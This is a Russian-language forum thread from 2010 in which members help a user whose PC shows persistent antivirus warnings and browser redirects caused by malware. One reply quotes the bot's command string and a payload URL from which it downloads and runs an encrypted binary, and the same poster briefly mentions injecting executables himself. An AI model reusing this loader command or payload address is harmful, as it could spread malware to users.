Вирус. Как избавиться?

Discussion in 'Болталка' started by Vlad3d, 26 Oct 2010.

  1. Vlad3d

    Vlad3d Elder - Старейшина

    Joined:
    18 Jan 2008
    Messages:
    47
    Likes Received:
    54
    Reputations:
    -1
    http://s015.radikal.ru/i332/1010/a1/c17dcf378897.jpg - вот скрин


    Суть проблемы: Постоянно выскакивает то предупреждение, которое справа внизу(точнее выскакивает при открытии браузера, переходе на сайт любой и т.д.)


    Hosts нет ничего лишнего...
     
  2. sn0w

    sn0w Статус пользователя:

    Joined:
    26 Jul 2005
    Messages:
    1,023
    Likes Received:
    1,300
    Reputations:
    327
    чето както похоже на аваст. те не кажется?)))
    наверное лоадер какойто заразы пытается себя залить к тебе. качнуть свое тело или примочку с этого сайта. я в плане что сам лоадер уже у тя на тачке
     
    #2 sn0w, 26 Oct 2010
    Last edited: 26 Oct 2010
  3. Vlad3d

    Vlad3d Elder - Старейшина

    Joined:
    18 Jan 2008
    Messages:
    47
    Likes Received:
    54
    Reputations:
    -1
    :D это он и есть....
    Я имел ввиду как избавиться от этого(точнее предупреждение убрать легко), а как избавиться от перенаправления на этот сайт?

    P.S. сорри, просто я плохо в первом посте описал, что мне надо...
     
    #3 Vlad3d, 26 Oct 2010
    Last edited: 26 Oct 2010
  4. NemTaq

    NemTaq Member

    Joined:
    11 Aug 2010
    Messages:
    115
    Likes Received:
    19
    Reputations:
    14
    может сайт прописался как дом. страница в браузере, а антивирусник его блокирует! :mad:
     
  5. NemTaq

    NemTaq Member

    Joined:
    11 Aug 2010
    Messages:
    115
    Likes Received:
    19
    Reputations:
    14
    хотя отключи "уведомления о блокировании" и живи счастливо!
     
  6. Vlad3d

    Vlad3d Elder - Старейшина

    Joined:
    18 Jan 2008
    Messages:
    47
    Likes Received:
    54
    Reputations:
    -1
    нет, табличка выскакивает(т.е. меня перекидывает на этот сайт), даже тогда, когда я например, нажимаю "новые сообщения" тут на форуме

    так не пойдет...
     
  7. sn0w

    sn0w Статус пользователя:

    Joined:
    26 Jul 2005
    Messages:
    1,023
    Likes Received:
    1,300
    Reputations:
    327
    !config wheeeler.net k1ak1a.net eleonnora.net 9600 !load !67 http://moneyt.net/d4hfmh1dbze6l.php?id=1&magic=774460131 9600

    вот эту команду он сгрузить пытается

    а тут лежит криптанутое тельце
    http://moneyt.net/d4hfmh1dbze6l.php?id=1&magic=774460131
     
  8. Fepsis

    Fepsis Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    791
    Likes Received:
    391
    Reputations:
    72
    проскань машину Dr.Web CureIt! или Kaspersky Virus Removal Tool
     
  9. Vlad3d

    Vlad3d Elder - Старейшина

    Joined:
    18 Jan 2008
    Messages:
    47
    Likes Received:
    54
    Reputations:
    -1
    это куда девать??? :-[

    Dr.Web CureIt! нашел только всякие старенькие бруты =(
     
  10. sn0w

    sn0w Статус пользователя:

    Joined:
    26 Jul 2005
    Messages:
    1,023
    Likes Received:
    1,300
    Reputations:
    327
    твоя вирусня при коннекте исполняет эту команду.
    и должна грузануть бинарник с
    http://moneyt.net/d4hfmh1dbze6l.php?id=1&magic=774460131

    это вроде не ехе но думаю что ехе но закриптованый.


    еслип ты не вкурил - то уже на твоей тачке крутится эта херь которая соединяется с этим сайтом и считывает с него команду конфиг. в этом конфиге прописан залив данных с http://moneyt.net/d4hfmh1dbze6l.php?id=1&magic=774460131 а так как файер не дает ему ее прочитать то соответсна хвост он у тя слить не может

    возми поставь микрософт нетворк монитор и определи из какого процесса идет запрос на соединение. думаю это просто дллка подгруженная. хотя я обычно инжектю копию ехе
     
    #10 sn0w, 26 Oct 2010
    Last edited: 26 Oct 2010
  11. Vlad3d

    Vlad3d Elder - Старейшина

    Joined:
    18 Jan 2008
    Messages:
    47
    Likes Received:
    54
    Reputations:
    -1
    как бы от этой хрени избавиться теперь....
     
  12. NemTaq

    NemTaq Member

    Joined:
    11 Aug 2010
    Messages:
    115
    Likes Received:
    19
    Reputations:
    14
    sn0w, может это довнлоадер? тупо скачивает с того сайта троянские программы без ведома пользавателя.
     
  13. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    А месэдж этот аваст выдаёт после запуска оперы, или периодически, если ваще никакой софт не загружен?
     
  14. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    наверное стоит начать с удаления аваста..
     
  15. Vlad3d

    Vlad3d Elder - Старейшина

    Joined:
    18 Jan 2008
    Messages:
    47
    Likes Received:
    54
    Reputations:
    -1
    при открытие любого сайта, при переходе по любой ссылке....я уже писал это

    Наверное стоит переходить на linux, Ubuntu, etc
     
  16. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Оперу переустанови ;) .
     
  17. Vlad3d

    Vlad3d Elder - Старейшина

    Joined:
    18 Jan 2008
    Messages:
    47
    Likes Received:
    54
    Reputations:
    -1
    в других браузерах то же самое
     
  18. dupD0M

    dupD0M Elder - Старейшина

    Joined:
    18 May 2010
    Messages:
    1,130
    Likes Received:
    74
    Reputations:
    34
    правильно подметил!
     
  19. UNAT

    UNAT New Member

    Joined:
    22 Aug 2009
    Messages:
    26
    Likes Received:
    2
    Reputations:
    2
    А может у тебя этот сайт в прокси прописался? У меня разок попалась такая зараза, тоже каспер верещал куда не перейду - везде "опасносте!!! Отаке!!", оказалось во всех браузерах *чудом* настроилась работа через прокси *плохого дяди*
     
  20. C00LPack

    C00LPack Elder - Старейшина

    Joined:
    7 Oct 2010
    Messages:
    425
    Likes Received:
    72
    Reputations:
    19
    а можеш тупо в хостс файле заблокировать доступ на этот сайт
     
Loading...
Similar Threads - Вирус избавиться
  1. charlie_miller
    Replies:
    4
    Views:
    2,096